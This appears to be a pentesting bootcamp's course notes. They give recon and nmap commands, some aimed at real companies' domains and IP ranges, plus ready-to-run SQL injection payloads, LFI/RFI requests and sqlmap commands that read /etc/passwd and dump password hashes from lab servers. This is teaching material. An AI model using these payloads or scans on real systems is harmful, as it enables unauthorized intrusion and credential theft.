Advertisement
joemccray

Pentester 2-Day Bootcamp

Nov 21st, 2016
2,264
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ########################################
  2. # Pentesting 2-Day Bootcamp #
  3. # By Joe McCray of Strategic Security #
  4. ########################################
  5.  
  6.  
  7.  
  8. #############################
  9. # Here are the class videos #
  10. #############################
  11. Day 1: Class video
  12. https://s3.amazonaws.com/StrategicSec-Videos/2016/NovemberBundle/2016-11-21+09.28+Pentester+2-Day+Bootcamp+2016.mp4
  13.  
  14. Day 2: Class video
  15.  
  16.  
  17.  
  18.  
  19. Here is the VMWare virtual machine for the class:
  20.  
  21. https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
  22.  
  23. user: strategicsec
  24.  
  25. pass: strategicsec
  26.  
  27.  
  28.  
  29.  
  30.  
  31. ################
  32. # Day 1: Recon #
  33. ################
  34.  
  35. Email Harvesting
  36. ----------------
  37.  
  38. cd ~/toolz/
  39.  
  40. rm -rf theharvester-read-only/
  41.  
  42. sudo apt-get install -y python-pyasn1 python-pyasn1-modules
  43.  
  44. git clone https://github.com/laramies/theHarvester.git
  45.  
  46. cd theHarvester/
  47.  
  48. python theHarvester.py
  49.  
  50. python theHarvester.py -d motorola.com -l 50 -b google
  51.  
  52. python theHarvester.py -d motorola.com -l 50 -b bing
  53.  
  54. python theHarvester.py -d motorola.com -l 50 -b linkedin
  55.  
  56. python theHarvester.py -d motorola.com -l 50 -b pgp
  57.  
  58.  
  59.  
  60.  
  61.  
  62. File Meta-Data Harvesting
  63. -------------------------
  64. cd ~/toolz/
  65.  
  66. sudo apt-get install -y python-pip
  67. strategicsec
  68.  
  69. sudo pip install google
  70. strategicsec
  71.  
  72. git clone https://github.com/opsdisk/metagoofil.git
  73.  
  74. cd metagoofil/
  75.  
  76.  
  77. python metagoofil.py -d motorola.com -t doc,pdf -l 100 -n 3 -o motorolafiles
  78.  
  79.  
  80.  
  81.  
  82.  
  83. python metagoofil.py -d [domain name] -t doc,pdf -l 100 -n 3 -o motorolafiles
  84. Whereas:
  85.  
  86. -d : I used another domain name aside from Google.com to make it work
  87. -t : I asked for the program to search two types of public documents whuch are doc and pdf files
  88. -l : I limited the search result to 100 to make the process faster
  89. -n : I limited the downloads (files that are going to be downloaded to get their metadatas extracted) to only 3 to make the process faster
  90. -o : I directed the result of the compilation t motorolafiles, which is a file located inside the metagoofil directory (~/toolz/metagoofil/motorolafiles)
  91. -f : Save the html links to html_links_<TIMESTAMP>.txt file
  92.  
  93.  
  94.  
  95.  
  96.  
  97.  
  98. Github Info Harvesting
  99. ----------------------
  100. cd ~/toolz/
  101.  
  102. sudo pip install gitem
  103. strategicsec
  104.  
  105. gitem organization facebook
  106.  
  107.  
  108. gitem repository facebook react
  109.  
  110.  
  111. gitem --processes 4 user zpao
  112.  
  113.  
  114.  
  115.  
  116. Network Topology Enumeration
  117. ----------------------------
  118.  
  119. cd ~/toolz/
  120.  
  121. wget https://raw.githubusercontent.com/leonteale/pentestpackage/master/gxfr.py
  122.  
  123. python gxfr.py --bxfr --dns-lookup -o
  124. motorola.com
  125. [ press enter ]
  126. cw1kxyUgMdkECBNMb1fGqKJ9sC1lznaR20fPJeIt45Y=
  127.  
  128.  
  129.  
  130.  
  131. cd ~/toolz/
  132.  
  133. sudo rm -rf fierce2/
  134. strategicsec
  135.  
  136. git clone https://github.com/mschwager/fierce.git
  137.  
  138. cd fierce
  139.  
  140. sudo apt-get install -y python3-pip
  141. strategicsec
  142.  
  143. sudo pip3 install -r requirements.txt
  144. strategicsec
  145.  
  146. python3 fierce.py -h
  147.  
  148. python3 fierce.py --domain facebook.com --subdomains accounts admin ads
  149. Traverse IPs near discovered domains to search for contiguous blocks with the --traverse flag:
  150.  
  151. python3 fierce.py --domain facebook.com --subdomains admin --traverse 10
  152.  
  153.  
  154. Limit nearby IP traversal to certain domains with the --search flag:
  155.  
  156. python3 fierce.py --domain facebook.com --subdomains admin --search fb.com fb.net
  157.  
  158.  
  159. Attempt an HTTP connection on domains discovered with the --connect flag:
  160.  
  161. python3 fierce.py --domain stackoverflow.com --subdomains mail --connect
  162.  
  163.  
  164.  
  165.  
  166.  
  167. Find Web Servers
  168. ---------------
  169.  
  170. cd ~/toolz/
  171.  
  172. for i in $(seq 1 254); do echo "144.188.128.$i" >> motorola-IPs.txt; done
  173.  
  174.  
  175.  
  176. wget https://raw.githubusercontent.com/leonteale/pentestpackage/master/web-service-finder.sh
  177.  
  178. sh web-service-finder.sh motorola-IPs.txt
  179.  
  180.  
  181.  
  182.  
  183.  
  184.  
  185. Recon-NG (Metasploit for Recon):
  186. --------------------------------
  187. cd ~/toolz/
  188.  
  189. sudo apt-get install -y git python-pip python-dnspython python-mechanize python-slowaes python-xlsxwriter python-jsonrpclib python-lxml
  190. strategicsec
  191.  
  192. sudo pip install dicttoxml
  193. strategicsec
  194.  
  195.  
  196.  
  197. git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
  198. cd recon-ng
  199. ./recon-ng
  200.  
  201.  
  202.  
  203. At the prompt, let's type help in order to look at the commands we can use in Recon-ng.
  204.  
  205. recon-ng > help
  206.  
  207.  
  208. Note that many of these commands are nearly identical to Metasploit including back, set, use, search, show, and unset.
  209.  
  210. recon-ng > [ TAB ] [ TAB ]
  211.  
  212.  
  213.  
  214. To see all the modules in Recon-ng, we can type:
  215.  
  216. recon-ng > show [ TAB ] [ TAB ]
  217.  
  218.  
  219.  
  220. Ok, let's drive this thing....
  221.  
  222. recon-ng > show banner
  223.  
  224. recon-ng > show companies
  225.  
  226. recon-ng > show contacts
  227.  
  228. recon-ng > show credentials
  229.  
  230. recon-ng > show dashboard
  231.  
  232. recon-ng > show domains
  233.  
  234. recon-ng > show hosts
  235.  
  236. recon-ng > show keys
  237.  
  238. recon-ng > show leaks
  239.  
  240. recon-ng > show locations
  241.  
  242. recon-ng > show modules
  243.  
  244. recon-ng > show netblocks
  245.  
  246. recon-ng > show options
  247.  
  248. recon-ng > show ports
  249.  
  250. recon-ng > show profiles
  251.  
  252. recon-ng > show pushpins
  253.  
  254. recon-ng > show repositories
  255.  
  256. recon-ng > show schema
  257.  
  258. recon-ng > show vulnerabilities
  259.  
  260. recon-ng > show workspaces
  261.  
  262.  
  263.  
  264.  
  265.  
  266. When you have found a module that you would like to try the process is fairly straight forward.
  267.  
  268. Type, “use [Modulename]” to use the module
  269.  
  270. Type, “show info” to view information about the module
  271.  
  272. And then, “show options” to see what variables can be set
  273.  
  274. Set the option variables with “set [variable]”
  275.  
  276. Finally, type “run” to execute the module
  277.  
  278.  
  279.  
  280.  
  281.  
  282.  
  283. ********************************** Begin Day 1 Homework **********************************
  284. NOTE: THIS IS AN ABSOLUTE REQUIREMENT FOR YOUR CPE CREDITS
  285.  
  286.  
  287. You must take screenshots of the process of you registering at least 5 API keys, as well as screenshots of you using at least 10 Recon-NG modules against a target company.
  288.  
  289.  
  290. You must create a MS WORD document titled 'FirstName-LastName-Pentester-Bootcamp-Day1-Recon-NG.docx' (ex: Joseph-McCray-Pentester-Bootcamp-Day1-Recon-NG.docx).
  291.  
  292. You must spell you name EXACTLY as you want it spelled on your class certificate.
  293.  
  294.  
  295. Reference links:
  296. http://null-byte.wonderhowto.com/how-to/hack-like-pro-reconnaissance-with-recon-ng-part-1-getting-started-0169854/
  297. http://resources.infosecinstitute.com/basic-updated-guide-to-recon-ng-plus-new-modules-rundown/
  298.  
  299. IMPORTANT NOTE:
  300. Your homework must be submitted via email to both (joe@strategicsec.com and kasheia@strategicsec.com) by Sunday November 27th at midnight EST.
  301.  
  302. ********************************** End Day 1 Homework **********************************
  303.  
  304.  
  305.  
  306.  
  307. ########################
  308. # Scanning Methodology #
  309. ########################
  310.  
  311. - Ping Sweep
  312. What's alive?
  313. ------------
  314. sudo nmap -sP 157.166.226.*
  315. strategicsec
  316.  
  317. -if -SP yields no results try:
  318. sudo nmap -sL 157.166.226.*
  319. strategicsec
  320.  
  321. sudo nmap -sL 157.166.226.* | grep com
  322. strategicsec
  323.  
  324. - Port Scan
  325. What's where?
  326. ------------
  327. sudo nmap -sS 162.243.126.247
  328. strategicsec
  329.  
  330.  
  331. - Bannergrab/Version Query
  332. What versions of software are running
  333. -------------------------------------
  334. sudo nmap -sV 162.243.126.247
  335. strategicsec
  336.  
  337.  
  338. - Vulnerability Research
  339. Lookup the banner versions for public exploits
  340. ----------------------------------------------
  341. http://exploit-db.com
  342. http://securityfocus.com/bid
  343. https://packetstormsecurity.com/files/tags/exploit/
  344.  
  345.  
  346.  
  347. #######################################################
  348. # Day 1: 3rd Party Scanning, and scanning via proxies #
  349. #######################################################
  350.  
  351. https://www.shodan.io/
  352.  
  353. Create a FREE account and login
  354.  
  355. net:129.188.8.0/24
  356.  
  357.  
  358.  
  359. cd /home/strategicsec/toolz/
  360. perl proxyfinder-0.3.pl multiproxy 3 proxies.txt <-- This takes a long time to run
  361.  
  362.  
  363.  
  364. sudo vi /etc/proxychains.conf <--- Make sure that last line of the file is: socks4 127.0.0.1 9050
  365. strategicsec
  366.  
  367.  
  368.  
  369.  
  370. ----------------------------------------------------------------------
  371. vi ~/toolz/fix-proxychains-dns.sh
  372.  
  373. #!/bin/bash
  374. # This script is called by proxychains to resolve DNS names
  375. # DNS server used to resolve names
  376. # Reference: http://carnal0wnage.attackresearch.com/2013/09/changing-proxychains-hardcoded-dns.html
  377. DNS_SERVER=4.2.2.2
  378.  
  379. if [ $# = 0 ] ; then
  380. echo " usage:"
  381. echo " proxyresolv <hostname> "
  382. exit
  383. fi
  384.  
  385. export LD_PRELOAD=libproxychains.so.3
  386. dig $1 @$DNS_SERVER +tcp | awk '/A.+[0-9]+\.[0-9]+\.[0-9]/{print $5;}'
  387. -----------------------------------------------------------------------
  388.  
  389.  
  390. sudo ntpdate pool.ntp.org
  391. strategicsec
  392.  
  393. tor-resolve strategicsec.com
  394.  
  395. proxychains nmap -sT -p80 162.243.126.247
  396.  
  397. proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,445,1433,1521,3306,3389,8080,10000 162.243.126.247
  398.  
  399.  
  400.  
  401.  
  402.  
  403.  
  404.  
  405. #########################
  406. # Playing with Nmap NSE #
  407. #########################
  408.  
  409. nmap -Pn -p80 --script ip-geolocation-* strategicsec.com
  410.  
  411. nmap -p80 --script dns-brute strategicsec.com
  412.  
  413. nmap --script http-robtex-reverse-ip secore.info
  414.  
  415. nmap -Pn -p80 --script=http-headers strategicsec.com
  416.  
  417.  
  418. ls /usr/share/nmap/scripts | grep http
  419. nmap -Pn -p80 --script=http-* strategicsec.com
  420.  
  421.  
  422.  
  423.  
  424. #####################################
  425. # Writing Your Own Nmap NSE Scripts #
  426. #####################################
  427.  
  428.  
  429. ----------------------------------------------------------------------
  430. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  431.  
  432. -- The Head Section --
  433. -- The Rule Section --
  434. portrule = function(host, port)
  435. return port.protocol == "tcp"
  436. and port.number == 80
  437. and port.state == "open"
  438. end
  439.  
  440. -- The Action Section --
  441. action = function(host, port)
  442. return "Pentester Bootcamp!"
  443. end
  444. ----------------------------------------------------------------------
  445.  
  446. - Ok, now that we've made that change let's run the script
  447. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse strategicsec.com -p 22,80,443
  448.  
  449.  
  450.  
  451.  
  452.  
  453.  
  454. ----------------------------------------------------------------------
  455. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  456.  
  457. -- The Head Section --
  458. local shortport = require "shortport"
  459.  
  460. -- The Rule Section --
  461. portrule = shortport.http
  462.  
  463.  
  464. -- The Action Section --
  465. action = function(host, port)
  466. return "Pentester Bootcamp!"
  467. end
  468. ----------------------------------------------------------------------
  469.  
  470. - Ok, now that we've made that change let's run the script
  471. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse strategicsec.com -p 22,80,443
  472.  
  473.  
  474.  
  475.  
  476.  
  477.  
  478.  
  479. OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year.
  480.  
  481. ----------------------------------------------------------------------
  482. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  483.  
  484. -- The Head Section --
  485. local shortport = require "shortport"
  486. local http = require "http"
  487.  
  488. -- The Rule Section --
  489. portrule = shortport.http
  490.  
  491. -- The Action Section --
  492. action = function(host, port)
  493.  
  494. local uri = "/installing-metasploit-in-ubunt/"
  495. local response = http.get(host, port, uri)
  496. return response.status
  497.  
  498. end
  499. ----------------------------------------------------------------------
  500.  
  501. - Ok, now that we've made that change let's run the script
  502. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  503.  
  504.  
  505.  
  506.  
  507. ----------------------------------------------------------------------
  508. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  509.  
  510. -- The Head Section --
  511. local shortport = require "shortport"
  512. local http = require "http"
  513.  
  514. -- The Rule Section --
  515. portrule = shortport.http
  516.  
  517. -- The Action Section --
  518. action = function(host, port)
  519.  
  520. local uri = "/installing-metasploit-in-ubunt/"
  521. local response = http.get(host, port, uri)
  522.  
  523. if ( response.status == 200 ) then
  524. return response.body
  525. end
  526.  
  527. end
  528. ----------------------------------------------------------------------
  529.  
  530. - Ok, now that we've made that change let's run the script
  531. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  532.  
  533.  
  534.  
  535.  
  536.  
  537.  
  538.  
  539.  
  540.  
  541. ----------------------------------------------------------------------
  542. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  543.  
  544. -- The Head Section --
  545. local shortport = require "shortport"
  546. local http = require "http"
  547. local string = require "string"
  548.  
  549. -- The Rule Section --
  550. portrule = shortport.http
  551.  
  552. -- The Action Section --
  553. action = function(host, port)
  554.  
  555. local uri = "/installing-metasploit-in-ubunt/"
  556. local response = http.get(host, port, uri)
  557.  
  558. if ( response.status == 200 ) then
  559. local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
  560. return title
  561. end
  562.  
  563. end
  564. ----------------------------------------------------------------------
  565.  
  566. - Ok, now that we've made that change let's run the script
  567. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  568.  
  569.  
  570.  
  571.  
  572.  
  573.  
  574.  
  575. ----------------------------------------------------------------------
  576. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  577.  
  578. -- The Head Section --
  579. local shortport = require "shortport"
  580. local http = require "http"
  581. local string = require "string"
  582.  
  583. -- The Rule Section --
  584. portrule = shortport.http
  585.  
  586. -- The Action Section --
  587. action = function(host, port)
  588.  
  589. local uri = "/installing-metasploit-in-ubunt/"
  590. local response = http.get(host, port, uri)
  591.  
  592. if ( response.status == 200 ) then
  593. local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
  594.  
  595. if (title) then
  596. return "Vulnerable"
  597. else
  598. return "Not Vulnerable"
  599. end
  600. end
  601. end
  602.  
  603. ----------------------------------------------------------------------
  604.  
  605. - Ok, now that we've made that change let's run the script
  606. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  607.  
  608.  
  609.  
  610. ********************************** Begin Day 1 Homework Part 2 **********************************
  611. NOTE: THIS IS AN ABSOLUTE REQUIREMENT FOR YOUR CPE CREDITS
  612.  
  613. You must take screenshots of you performing all of the scanning tasks that we have done so far today
  614.  
  615. You must create a MS WORD document titled 'FirstName-LastName-Pentester-Bootcamp-Day1-Adv-Scanning.docx' (ex: Joseph-McCray-Pentester-Bootcamp-Day1-Adv-Scanning.docx).
  616.  
  617. You must spell you name EXACTLY as you want it spelled on your class certificate.
  618.  
  619. IMPORTANT NOTE:
  620. Your homework must be submitted via email to both (joe@strategicsec.com and kasheia@strategicsec.com) by Sunday November 27th at midnight EST.
  621.  
  622. ********************************** End Day 1 Homework Part 2 **********************************
  623.  
  624.  
  625.  
  626.  
  627.  
  628.  
  629.  
  630.  
  631.  
  632.  
  633. ##########################
  634. # Day 2: Web App Testing #
  635. ##########################
  636.  
  637.  
  638.  
  639.  
  640.  
  641. #######################
  642. # Attacking PHP/MySQL #
  643. #######################
  644.  
  645. Go to LAMP Target homepage
  646. http://54.172.112.249/
  647.  
  648.  
  649.  
  650. Clicking on the Acer Link:
  651. http://54.172.112.249/acre2.php?lap=acer
  652.  
  653. - Found parameter passing (answer yes to question 1)
  654. - Insert ' to test for SQLI
  655.  
  656. http://54.172.112.249/acre2.php?lap=acer'
  657.  
  658.  
  659. Page returns the following error:
  660. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''acer''' at line 1
  661.  
  662.  
  663.  
  664. In order to perform union-based sql injection - we must first determine the number of columns in this query.
  665. We do this using the ORDER BY
  666. http://54.172.112.249/acre2.php?lap=acer' order by 100-- +
  667.  
  668. Page returns the following error:
  669. Unknown column '100' in 'order clause'
  670.  
  671.  
  672.  
  673. http://54.172.112.249/acre2.php?lap=acer' order by 50-- +
  674.  
  675. Page returns the following error:
  676. Unknown column '50' in 'order clause'
  677.  
  678.  
  679.  
  680. http://54.172.112.249/acre2.php?lap=acer' order by 25-- +
  681. Page returns the following error:
  682. Unknown column '25' in 'order clause'
  683.  
  684.  
  685.  
  686. http://54.172.112.249/acre2.php?lap=acer' order by 12-- +
  687.  
  688. Page returns the following error:
  689. Unknown column '50' in 'order clause'
  690.  
  691.  
  692.  
  693. http://54.172.112.249/acre2.php?lap=acer' order by 6-- +
  694. ---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
  695.  
  696.  
  697.  
  698. Now we build out the union all select statement with the correct number of columns
  699.  
  700. Reference:
  701. http://www.techonthenet.com/sql/union.php
  702.  
  703.  
  704.  
  705. http://54.172.112.249/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
  706.  
  707.  
  708.  
  709. Now we negate the parameter value 'acer' by turning into the word 'null':
  710. http://54.172.112.249/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
  711.  
  712. We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
  713.  
  714.  
  715. Use a cheat sheet for syntax:
  716. http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
  717.  
  718.  
  719. http://54.172.112.249/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
  720.  
  721. http://54.172.112.249/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
  722.  
  723. http://54.172.112.249/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
  724.  
  725. http://54.172.112.249/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
  726.  
  727.  
  728. http://54.172.112.249/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
  729.  
  730.  
  731.  
  732.  
  733. Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)
  734. http://54.172.112.249/showfile.php?filename=about.txt
  735.  
  736.  
  737.  
  738. See if you can read files on the file system:
  739. http://54.172.112.249/showfile.php?filename=/etc/passwd
  740.  
  741. We call this attack a Local File Include or LFI.
  742.  
  743. Now let's find some text out on the internet somewhere:
  744. http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
  745.  
  746.  
  747. Now let's append that URL to our LFI and instead of it being Local - it is now a Remote File Include or RFI:
  748. http://54.172.112.249/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
  749.  
  750.  
  751. -----------------Some Automated Testing from the strategicsec VM-----------------
  752.  
  753. ##################################################
  754. # You can download the virtual machine from here #
  755. ##################################################
  756. https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
  757. user: strategicsec
  758. pass: strategicsec
  759.  
  760.  
  761.  
  762. cd /home/strategicsec/toolz/sqlmap-dev/
  763.  
  764. python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" -b -v 3
  765.  
  766.  
  767. python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" --current-user -v 3
  768.  
  769.  
  770. python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" --current-db -v 3
  771.  
  772.  
  773. python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" --privileges -v 3
  774.  
  775.  
  776. python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" --dbs -v 3
  777.  
  778.  
  779. python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" --tables -v 3
  780.  
  781.  
  782. python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" --file-read=/etc/issue -v 3
  783.  
  784.  
  785. python sqlmap.py -u "http://54.172.112.249/acre2.php?lap=acer" --file-read=/etc/passwd -v 3
  786.  
  787.  
  788.  
  789.  
  790.  
  791. #############################
  792. # Error-Based SQL Injection #
  793. #############################
  794. http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
  795. http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
  796. http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
  797. http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
  798. http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
  799. http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
  800. http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
  801. http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
  802. http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
  803.  
  804.  
  805.  
  806.  
  807. #############################
  808. # Union-Based SQL Injection #
  809. #############################
  810. http://54.213.252.28/bookdetail.aspx?id=2 order by 100--
  811. http://54.213.252.28/bookdetail.aspx?id=2 order by 50--
  812. http://54.213.252.28/bookdetail.aspx?id=2 order by 25--
  813. http://54.213.252.28/bookdetail.aspx?id=2 order by 10--
  814. http://54.213.252.28/bookdetail.aspx?id=2 order by 5--
  815. http://54.213.252.28/bookdetail.aspx?id=2 order by 6--
  816. http://54.213.252.28/bookdetail.aspx?id=2 order by 7--
  817. http://54.213.252.28/bookdetail.aspx?id=2 order by 8--
  818. http://54.213.252.28/bookdetail.aspx?id=2 order by 9--
  819. http://54.213.252.28/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
  820.  
  821. We are using a union select statement because we are joining the developer's query with one of our own.
  822. Reference:
  823. http://www.techonthenet.com/sql/union.php
  824. The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
  825. It removes duplicate rows between the various SELECT statements.
  826.  
  827. Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
  828.  
  829. http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
  830.  
  831. Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
  832.  
  833. http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
  834. http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
  835. http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
  836. http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
  837.  
  838.  
  839.  
  840.  
  841.  
  842. - Another way is to see if you can get the backend to perform an arithmetic function
  843. http://54.213.252.28/bookdetail.aspx?id=(2)
  844. http://54.213.252.28/bookdetail.aspx?id=(4-2)
  845. http://54.213.252.28/bookdetail.aspx?id=(4-1)
  846.  
  847.  
  848.  
  849. http://54.213.252.28/bookdetail.aspx?id=2 or 1=1--
  850. http://54.213.252.28/bookdetail.aspx?id=2 or 1=2--
  851. http://54.213.252.28/bookdetail.aspx?id=1*1
  852. http://54.213.252.28/bookdetail.aspx?id=2 or 1 >-1#
  853. http://54.213.252.28/bookdetail.aspx?id=2 or 1<99#
  854. http://54.213.252.28/bookdetail.aspx?id=2 or 1<>1#
  855. http://54.213.252.28/bookdetail.aspx?id=2 or 2 != 3--
  856. http://54.213.252.28/bookdetail.aspx?id=2 &0#
  857.  
  858.  
  859.  
  860.  
  861.  
  862. ###############################
  863. # Blind SQL Injection Testing #
  864. ###############################
  865. Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
  866.  
  867. 3 - Total Characters
  868. http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
  869. http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
  870. http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
  871.  
  872. Let's go for a quick check to see if it's DBO
  873. http://54.213.252.28/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
  874.  
  875. Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
  876.  
  877. D - 1st Character
  878. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
  879. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
  880. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
  881. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
  882.  
  883. B - 2nd Character
  884. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  885. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  886.  
  887. O - 3rd Character
  888. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  889. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
  890. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  891. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  892. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
  893. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
  894. http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  895.  
  896.  
  897.  
  898.  
  899. ************************ Class Homework ************************
  900.  
  901. Perform a mock penetration test against http://54.172.112.249 using what you have learned in this pastebin.
  902.  
  903. You don't need to document it for me, but go through the steps for your own understanding.
  904.  
  905.  
  906.  
  907.  
  908.  
  909. ************************ Class Challenge ************************
  910.  
  911. Let's see how you do with someone else's vulnerable website. Your 1st target is: http://zero.webappsecurity.com
  912.  
  913. Here are some sample web app penetration test reports from other companies that you can look at:
  914. https://s3.amazonaws.com/StrategicSec-Files/WebAppSampleReports.zip
  915.  
  916. I want you to perform a penetration test against http://zero.webappsecurity.com and document the engagement as if it were a real project.
  917.  
  918.  
  919.  
  920.  
  921.  
  922.  
  923.  
  924. ###############################################################
  925. # Question 1: What is the process that you use when you test? #
  926. ###############################################################
  927.  
  928. Step 1: Automated Testing
  929.  
  930. Step 1a: Web Application vulnerability scanners
  931. -----------------------------------------------
  932. - Run two (2) unauthenticated vulnerability scans against the target
  933. - Run two (2) authenticated vulnerability scans against the target with low-level user credentials
  934. - Run two (2) authenticated vulnerability scans against the target with admin privileges
  935.  
  936. The web application vulnerability scanners that I use for this process are (HP Web Inspect, and Acunetix).
  937.  
  938. A good web application vulnerability scanner comparison website is here:
  939. http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html
  940.  
  941.  
  942. Look to see if there are cases where both scanners identify the same vulnerability. Investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
  943.  
  944. When you run into cases where one (1) scanner identifies a vulnerability that the other scanner does not you should still investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
  945.  
  946.  
  947. Be sure to look for scans that take more than 3 or 4 hours as your scanner may have lost its active session and is probably not actually finding real vulnerabilities anymore.
  948.  
  949.  
  950. Also, be sure to save the scan results and logs. I usually provide this data to the customer.
  951.  
  952.  
  953.  
  954. Step 1b: Directory Brute Forcer
  955. -------------------------------
